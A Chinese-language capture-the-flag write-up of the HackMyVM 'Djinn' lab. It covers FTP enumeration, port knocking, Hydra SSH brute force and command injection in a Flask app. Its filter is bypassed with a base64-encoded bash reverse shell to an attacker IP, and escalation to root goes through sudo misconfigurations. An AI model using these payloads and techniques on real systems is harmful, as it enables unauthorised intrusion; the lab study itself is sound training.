HMV Djinn

信息收集

NAMP 扫描

IP=192.168.0.183
nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 04:41 EDT
Nmap scan report for 192.168.0.183
Host is up (0.00035s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp open     ftp
22/tcp filtered ssh
MAC Address: 08:00:27:97:C1:B4 (Oracle VirtualBox virtual NIC)

有个 FTP 服务,上去看看 , 看看有没有匿名登录。
22 竟然是 filter 的，看来不是直接能 ssh 进去的。

FTP

ftp $IP
Connected to 192.168.0.183.
220 (vsFTPd 3.0.3)
Name (192.168.0.183:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||48637|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
-rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
226 Directory send OK.
ftp> get creds.txt
ftp> get game.txt
ftp> get message.txt
ftp> exit
221 Goodbye.

下载下来看看

┌──(root㉿kali)-[~/Downloads/Djinn]
└─# cat creds.txt
nitu:81299

┌──(root㉿kali)-[~/Downloads/Djinn]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.

┌──(root㉿kali)-[~/Downloads/Djinn]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.

试下 1337 端口

└─# telnet $IP 1337
Trying 192.168.0.183...
Connected to 192.168.0.183.
Escape character is '^]'.
  ____                        _____ _
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|


Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(4, '/', 2)
>

做题啊，写个 python 脚本

import socket
import re


def get_question(s):
    data = s.recv(1024).decode()
    print("d:"+data)
    question_re = re.search(r'(\d.+)\)', data)
    if question_re:
        return question_re.group(1)
    return None

def send_answer(s, answer):
    print("a:"+answer)
    s.sendall(answer.encode() + b'\n')


def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.183', 1337))
    while True:
        question = get_question(s)
        if not question:
            continue
        print("q:"+question)
        answer = str(eval(question.replace(',', '').replace("'", '')))
        send_answer(s, answer)
    s.close()

if __name__ == '__main__':
    main()

找到提示： Here is your gift , I hope you know what to do with it: 1356, 6784, 3409
联想到刚才的 22 是 filter 的，不会是敲门吧，试试

knock $IP 1356 6784 3409
nmap $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 EDT
Nmap scan report for 192.168.0.183
Host is up (0.00037s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
MAC Address: 08:00:27:97:C1:B4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds

渗透

果然啊，22 开了，接下来根据提示。用户可能是 nitish81299 ， 密码可能是 nitu:81299 或者 81299。手动试了几个，都不对，那就上 Hydra 吧。

echo 'nitu\nitish\nnitish81299' > userlist.txt
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt ssh://$IP

跑了挺久，没啥动静。停了休息一会。

想了想是不是我端口没扫到？开门服务的几个端口我都没扫出来。再扫一遍，把平时的参数都加上。

nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 21:10 EDT
Nmap scan report for 192.168.0.183
Host is up (0.00033s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
1337/tcp open  waste
7331/tcp open  swx
MAC Address: 08:00:27:97:C1:B4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.64 seconds

果然还有一个 web 服务跑在 7331 端口上，一边手动翻翻，再扫一波。

手动很快就翻完了，因为就一个主页，链接也点不动。

gobuster dir -u http://$IP:7331 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,html,txt,7z,zip
/wish                 (Status: 200) [Size: 385]
/genie                (Status: 200) [Size: 1676]

打开 /wish ，提交了 id 返回了:

<p>uid=33(www-data) gid=33(www-data) groups=33(www-data)</p>

看来可以 RCE 了，试试
pwncat-cs -lp 1234 后
提交一个 nc -e /bin/bash 192.168.0.30 1234 , 竟然提示 Wrong choice of words ，看来是不是要绕过一下。
nc 不行的话，那就试试 bash 吧。

/bin/bash -i >& /dev/tcp/192.168.0.30/1234 0>&1 还是不行。 如果是关键词过滤的话，试试看看编码。

Webshell

echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.30/1234 0>&1'" | base64
L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4zMC8xMjM0IDA+JjEnCg==

提交一个 echo 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4zMC8xMjM0IDA+JjEnCg==' | base64 -d | bash 。可以了。

注意，因为是 POST 的application/www-form-urlencoded， 以上提交都需要 urlencode 一下。

提权

信息收集

(remote) www-data@djinn:/opt/80$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@djinn:/opt/80$ sudo -l
[sudo] password for www-data:
(remote) www-data@djinn:/opt/80$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash

看下 app.py

    cat app.py

import subprocess

from flask import Flask, redirect, render_template, request, url_for

app = Flask(**name**)
app.secret_key = "key"

CREDS = "/home/nitish/.dev/creds.txt"

RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]

def validate(cmd):
if CREDS in cmd and "cat" not in cmd:
return True

    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False

@app.route("/", methods=["GET"])
def index():
return render_template("main.html")

@app.route("/wish", methods=['POST', "GET"])
def wish():
execute = request.form.get("cmd")
if execute:
if validate(execute):
output = subprocess.Popen(execute, shell=True,
stdout=subprocess.PIPE).stdout.read()
else:
output = "Wrong choice of words"

        return redirect(url_for("genie", name=output))
    else:
        return render_template('wish.html')

@app.route('/genie', methods=['GET', 'POST'])
def genie():
if 'name' in request.args:
page = request.args.get('name')
else:
page = "It's not that hard"

    return render_template('genie.html', file=page)

if **name** == "**main**":
app.run(host='0.0.0.0', debug=True)

看到了一个文件路径，/home/nitish/.dev/creds.txt ，看看里面有啥。

(remote) www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9

提权 nitish

直接拿来登录

ssh nitish@$IP
nitish@djinn:~$ id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
    (sam) NOPASSWD: /usr/bin/genie

nitish 可以以 sam 的身份执行 /usr/bin/genie ，看看这个文件。

nitish@djinn:~$ file /usr/bin/genie
/usr/bin/genie: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=3f0b0d4d3dacca65084b0fbe690cac95d143e61a, not stripped

nitish@djinn:~$ sudo -u sam /usr/bin/genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish

sudo -u sam /usr/bin/genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish

I know you've came to me bearing wishes in mind. So go ahead make your wishes.

positional arguments:
  wish                  Enter your wish

optional arguments:
  -h, --help            show this help message and exit
  -g, --god             pass the wish to god
  -p SHELL, --shell SHELL
                        Gives you shell
  -e EXEC, --exec EXEC  execute command


sudo -u sam /usr/bin/genie -e /bin/bash id
You are a noob hacker!!

nitish@djinn:~$ sudo -u sam /usr/bin/genie -e id id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

得到了一波嘲讽。在-e 的地方 可以执行个别命令。但是不知道具体咋用。试试有没有 man,看一下看看细节。

man genie
NAME
       genie - Make a wish

SYNOPSIS
       genie [-h] [-g] [-p SHELL] [-e EXEC] wish

DESCRIPTION
       genie would complete all your wishes, even the naughty ones.

       We  all  dream  of getting those crazy privelege escalations, this will even help you acheive
       that.

OPTIONS
       wish

              This is the wish you want to make .

       -g, --god

              Sometime we all would like to make a wish to  god,  this  option  let  you  make  wish
              directly to God;

              Though  genie  can't gurantee you that your wish will be heard by God, he's a busy man
              you know;

       -p, --shell

              Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"

       -e, --exec

              Execute command on someone else computer is just too damn fun,  but  this  comes  with
              some restrictions.

       -cmd

              You know sometime all you new is a damn CMD, windows I love you.

SEE ALSO
       mzfr.github.io

竟然还有一个 cmd 参数。
还有作者的博客： https://blog.mzfr.me/

提权 sam

nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd id
my man!!
$ id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$ /bin/bash
sam@djinn:~$
sam@djinn:~$ id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
sam@djinn:~$ sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago

sam 可以以 root 的身份执行 /root/lago ，看看这个文件。

sam@djinn:~$ file /root/lago
/root/lago: cannot open `/root/lago' (Permission denied)
sam@djinn:~$ ls -l /root/lago
ls: cannot access '/root/lago': Permission denied

啥也看不见。

sam@djinn:~$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
Enter the full of the file to read: /etc/shadow
User root is not allowed to read /etc/shadow
sam@djinn:~$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
Enter the full of the file to read: /root/lago
User root is not allowed to read /root/lago

啥也不让看。不过我在输入的地方，按了一下 Ctrl+C ，发现了一个提示。

sam@djinn:/opt$  sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:^CTraceback (most recent call last):
  File "/root/lago", line 161, in <module>
    main(options())
  File "/root/lago", line 111, in options
    choice = input("Enter your choice:")
KeyboardInterrupt

这玩意竟然是 python 写的，再加上刚才在/opt 下目录里都有 pyc 的文件。看看能不能找到密码。
在 sam 的用户的家 /home/sam 找到了：

sam@djinn:/home/sam$ ls -al
total 36
drwxr-x--- 4 sam  sam  4096 Nov 14  2019 .
drwxr-xr-x 4 root root 4096 Nov 14  2019 ..
-rw------- 1 root root  417 Nov 14  2019 .bash_history
-rw-r--r-- 1 root root  220 Oct 20  2019 .bash_logout
-rw-r--r-- 1 sam  sam  3771 Oct 20  2019 .bashrc
drwx------ 2 sam  sam  4096 Nov 11  2019 .cache
drwx------ 3 sam  sam  4096 Oct 20  2019 .gnupg
-rw-r--r-- 1 sam  sam   807 Oct 20  2019 .profile
-rw-r--r-- 1 sam  sam  1749 Nov  7  2019 .pyc
-rw-r--r-- 1 sam  sam     0 Nov  7  2019 .sudo_as_admin_successful

一个看起来非常有用的文件名，但是大小竟然是 0 . 不过那个 pyc 是啥？

sam@djinn:/home/sam$ cat .pyc
�
��]c@s}ddlmZddlmZddlmZd�Zd�Zd�d�Z       �Z
e
 d      krye
e       ��nd
S(
  i����(tgetuser(tsystem(trandintcCs    dGHdS(NsWorking on it!! ((((s/home/mzfr/scripts/exp.pyt
naughtyboscCsBtdd�}dGHtd�}||kr9td�ndGHdS(Niies"Choose a number between 1 to 100: sEnter your number: s/sin/shsBetter Luck next time(RtinputR(tnumts((s/home/mzfr/scripts/exp.pytguessit


cCs(t�}td�}d||fGHdS(Ns$Enter the full of the file to read: s!User %s is not allowed to read %s(RR(tusertpath((s/home/mzfr/scripts/exp.pyt      readfiless
                                                        cCs/dGHdGHdGHdGHdGHttd��}|S(NsWhat do you want to do ?s1 - Be naughtys2 - Guess the numbers3 - Read some damn files4 - WorksEnter your choice: (tintR(tchoice((s/home/mzfr/scripts/exp.pytoptionsscCs_|dkrt�nE|dkr,t�n/|dkrBt�n|dkrVdGHndGHdS(Niiiiswork your ass off!!s"Do something better with your life(RRR
(top((s/home/mzfr/scripts/exp.pytmain's






__main__N(
          tgetpassRtosRtrandomRRRR
R__name__(((s/home/mzfr/scripts/exp.py<module>s

看起来，这货就是 /root/lago 的编译文件。 大概能看出来有用的是 猜数字和读文件的两个部分（这两部分比较长）。
难道让我猜数字吗，我就一直猜一个数字 ，然后不停的执行，然后直到猜对？

while true;do
sudo -u root /root/lago;
done

再我坚持不懈的瞎输入 2 之后，竟然：

# pwd
/home
# id
uid=0(root) gid=0(root) groups=0(root)

真离谱。